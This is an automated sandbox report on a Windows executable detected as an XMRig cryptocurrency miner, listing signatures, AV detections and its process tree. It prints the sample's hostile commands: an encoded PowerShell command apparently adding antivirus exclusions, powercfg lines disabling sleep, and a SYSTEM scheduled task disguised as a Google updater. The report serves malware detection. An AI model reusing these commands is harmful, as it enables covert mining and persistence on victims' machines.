
Windows Analysis Report
1338.exe

Overview

General Information

Sample Name:1338.exe
Analysis ID:633539
MD5:ac711e6653707f0b1d245ff40d95385f
SHA1:279b9abaf000303983d6ecfb91e8b221b00fb198
SHA256:909409814d725477622728168035c3f2d259b5d8aa1ca77403d8c259bd7aba63
Tags:exe

Detection

BitCoin Miner, SilentXMRMiner, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Antivirus / Scanner detection for submitted sample
Yara detected SilentXMRMiner
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected BitCoin Miner
Modifies power options to not sleep / hibernate
Writes to foreign memory regions
Found strings related to Crypto-Mining
Encrypted powershell cmdline option found
Allocates memory in foreign processes
Creates files in the system32 config directory
Injects a PE file into a foreign processes
Obfuscated command line found
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Uses schtasks.exe or at.exe to add and modify task schedules
Potential dropper URLs found in powershell memory
Uses powercfg.exe to modify the power settings
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • 1338.exe (PID: 7044 cmdline: "C:\Users\user\Desktop\1338.exe" MD5: AC711E6653707F0B1D245FF40D95385F)
    • conhost.exe (PID: 7056 cmdline: C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\1338.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 7124 cmdline: C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 6280 cmdline: powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A" MD5: 95000560239032BC68B4C2FDFCDEF913)
      • cmd.exe (PID: 4992 cmdline: "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powercfg.exe (PID: 4680 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
        • powercfg.exe (PID: 6868 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
        • powercfg.exe (PID: 3392 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
        • powercfg.exe (PID: 6448 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
      • cmd.exe (PID: 6832 cmdline: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Google\Chrome\updater.exe^"' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 7000 cmdline: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Google\Chrome\updater.exe"' MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • cmd.exe (PID: 2508 cmdline: C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 2812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6772 cmdline: schtasks /run /tn "GoogleUpdateTaskMachineQC" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • updater.exe (PID: 6800 cmdline: C:\Program Files\Google\Chrome\updater.exe MD5: AC711E6653707F0B1D245FF40D95385F)
    • conhost.exe (PID: 6936 cmdline: C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 3552 cmdline: C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 6476 cmdline: powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A" MD5: 95000560239032BC68B4C2FDFCDEF913)
      • cmd.exe (PID: 2252 cmdline: "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powercfg.exe (PID: 5800 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
        • powercfg.exe (PID: 6768 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
        • powercfg.exe (PID: 7100 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
        • powercfg.exe (PID: 4556 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)
      • conhost.exe (PID: 6712 cmdline: C:\Windows\System32\conhost.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • conhost.exe (PID: 6236 cmdline: C:\Windows\System32\conhost.exe" "ossgiopsxz MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000018.00000002.655565529.0000027E1095A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
Process Memory Space: conhost.exe PID: 6936 | CoinMiner_Strings | Detects mining pool protocol string in Executable | Florian Roth
  • 0x81eb3:$sa1: stratum+tcp://
  • 0x85ca7:$sa1: stratum+tcp://
  • 0x12d467:$sa1: stratum+tcp://
  • 0x13125b:$sa1: stratum+tcp://
Process Memory Space: conhost.exe PID: 6936 | JoeSecurity_bitcoinminer | Yara detected BitCoin Miner | Joe Security
Process Memory Space: conhost.exe PID: 6936 | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

Source | Rule | Description | Author | Strings
24.2.conhost.exe.27e10da3ca8.5.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
24.2.conhost.exe.27e10da3ca8.5.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
24.2.conhost.exe.27e112a3ce0.6.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
24.2.conhost.exe.27e10b23c70.4.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
24.2.conhost.exe.27e112a3ce0.6.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: 1338.exe | Virustotal: Detection: 68%
Source: 1338.exe | Metadefender: Detection: 33%
Source: 1338.exe | ReversingLabs: Detection: 73%
Source: 1338.exe | Avira: detected
Source: C:\Program Files\Google\Chrome\updater.exe | Avira: detection malicious, Label: HEUR/AGEN.1205338
Source: C:\Program Files\Google\Chrome\updater.exe | Virustotal: Detection: 68%
Source: C:\Program Files\Google\Chrome\updater.exe | Metadefender: Detection: 33%
Source: C:\Program Files\Google\Chrome\updater.exe | ReversingLabs: Detection: 73%

Bitcoin Miner

Source: Yara match | File source: 24.2.conhost.exe.27e10da3ca8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.conhost.exe.27e10da3ca8.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.conhost.exe.27e112a3ce0.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.conhost.exe.27e10b23c70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.conhost.exe.27e112a3ce0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.655565529.0000027E1095A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: conhost.exe PID: 6936, type: MEMORYSTR
Source: conhost.exe, 00000018.00000002.655565529.0000027E1095A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: stratum+tcp://-:x@exit:0
Source: C:\Windows\System32\conhost.exe | Directory created: C:\Program Files\Google\Chrome\updater.exe
Source: C:\Windows\System32\conhost.exe | Directory created: C:\Program Files\Google\Libs
Source: C:\Windows\System32\conhost.exe | Directory created: C:\Program Files\Google\Telemetry
Source: Binary string: H:\CRYPTOCOIN\Mandark-master\obj\x64\Release\ClassLibrary.pdb | source: conhost.exe, 00000018.00000002.674440898.0000027E779F0000.00000004.08000000.00040000.00000000.sdmp

Networking

Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
Source: powershell.exe, 00000004.00000002.479136799.000002986A060000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000003.532650408.0000023C451E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.479466307.000002986A4C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000004.00000003.442875745.000002986A154000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000004.00000003.442875745.000002986A154000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft.coji
Source: powershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: conhost.exe, 00000001.00000002.516335707.000002779FFB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.469069937.0000029851FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.599425355.0000023C45321000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: conhost.exe, 00000018.00000002.655565529.0000027E1095A000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.gnu.org/licenses/
Source: conhost.exe, 00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jsonrpc.org/
Source: powershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: conhost.exe, 00000018.00000002.655565529.0000027E1095A000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/openwall/john/issues/3454#issuecomment-436899959
Source: powershell.exe, 00000004.00000002.478242785.00000298536E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.479136799.000002986A060000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.vign.

System Summary

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: Process Memory Space: conhost.exe PID: 6936, type: MEMORYSTR | Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_frzn2qj0.jw3.ps1
Source: C:\Windows\System32\conhost.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Source: C:\Windows\System32\conhost.exe | Code function: 1_2_000002779DE89106
Source: C:\Windows\System32\conhost.exe | Code function: 1_2_000002779DE894D6
Source: C:\Windows\System32\conhost.exe | Code function: 1_2_000002779DE884D2
Source: C:\Windows\System32\conhost.exe | Code function: 1_2_000002779DE8990E
Source: C:\Windows\System32\conhost.exe | Code function: 1_2_000002779DE89D6A
Source: C:\Windows\System32\conhost.exe | Code function: 1_2_00007FF9F1C358CE
Source: C:\Windows\System32\conhost.exe | Code function: 1_2_00007FF9F1C34B1E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF9F1B51958
Source: C:\Windows\System32\conhost.exe | Code function: 24_2_0000027E764F9106
Source: C:\Windows\System32\conhost.exe | Code function: 24_2_0000027E764F94D6
Source: C:\Windows\System32\conhost.exe | Code function: 24_2_0000027E764F84D2
Source: C:\Windows\System32\conhost.exe | Code function: 24_2_0000027E764F990E
Source: C:\Windows\System32\conhost.exe | Code function: 24_2_0000027E764F9D6A
Source: C:\Windows\System32\conhost.exe | Code function: 24_2_00007FF9F1C04AA6
Source: C:\Windows\System32\conhost.exe | Code function: 24_2_00007FF9F1C05852
Source: C:\Windows\System32\conhost.exe | Code function: 24_2_00007FF9F1C003D8
Source: C:\Windows\System32\conhost.exe | Code function: 41_2_00000286977B50D6
Source: C:\Windows\System32\conhost.exe | Code function: 41_2_00000286977B4D06
Source: C:\Windows\System32\conhost.exe | Code function: 41_2_00000286977B596A
Source: C:\Windows\System32\conhost.exe | Code function: 41_2_00000286977B550E
Source: C:\Windows\System32\conhost.exe | Code function: 41_2_00000286977B40D2
Source: C:\Windows\System32\conhost.exe | Code function: 41_2_00007FF9F1C04536
Source: C:\Windows\System32\conhost.exe | Code function: 41_2_00007FF9F1C052E2
Source: C:\Users\user\Desktop\1338.exe | Code function: 0_2_004019C6 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\1338.exe | Code function: 0_2_00401946 NtCreateThreadEx
Source: C:\Users\user\Desktop\1338.exe | Code function: 0_2_00401A06 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\1338.exe | Code function: 0_2_00401986 NtWriteVirtualMemory
Source: C:\Windows\System32\conhost.exe | Code function: 24_2_00007FF9F1C0690E NtUnmapViewOfSection
Source: C:\Windows\System32\conhost.exe | Code function: 37_2_00401946 NtCreateThreadEx
Source: C:\Windows\System32\conhost.exe | Code function: 37_2_00401986 NtWriteVirtualMemory
Source: Joe Sandbox View | Dropped File: C:\Program Files\Google\Chrome\updater.exe 909409814D725477622728168035C3F2D259B5D8AA1CA77403D8C259BD7ABA63
Source: 1338.exe | Static PE information: Section: .rdata ZLIB complexity 0.999571628982
Source: updater.exe.1.dr | Static PE information: Section: .rdata ZLIB complexity 0.999571628982
Source: 1338.exe | Virustotal: Detection: 68%
Source: 1338.exe | Metadefender: Detection: 33%
Source: 1338.exe | ReversingLabs: Detection: 73%
Source: 1338.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\1338.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\1338.exe "C:\Users\user\Desktop\1338.exe"
Source: C:\Users\user\Desktop\1338.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\1338.exe
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Google\Chrome\updater.exe^"'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Google\Chrome\updater.exe"'
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /run /tn "GoogleUpdateTaskMachineQC"
Source: unknown | Process created: C:\Program Files\Google\Chrome\updater.exe C:\Program Files\Google\Chrome\updater.exe
Source: C:\Program Files\Google\Chrome\updater.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "ossgiopsxz
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 Jump to behavior
